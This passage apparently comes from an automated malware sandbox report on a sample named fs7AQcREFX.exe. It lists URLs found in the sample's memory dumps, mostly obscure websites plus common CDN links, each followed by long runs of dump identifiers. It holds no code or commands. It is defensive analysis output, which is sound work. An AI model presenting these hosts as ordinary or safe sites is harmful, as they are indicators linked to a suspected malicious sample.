00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.522264037.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg3.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.522264037.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg4.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.522264037.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg6.png
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/
                      Source: fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/&
                      Source: fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/g
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/zK
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/~
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.566027260.00000000061C4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568692969.00000000061E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/H
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.503667996.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/)U
                      Source: fs7AQcREFX.exe, 00000000.00000003.619068017.00000000061CA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.00000000061CA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629394436.00000000061C2000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/L
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/R
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/n
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503667996.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/sU
                      Source: fs7AQcREFX.exe, 00000000.00000003.619068017.00000000061CA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.00000000061CA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629394436.00000000061C2000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/0
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/M
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/Q
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/tW
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626019620.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628908863.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619032185.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.632199741.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629010341.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/J
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/MSIE
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwww.naoi-a.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
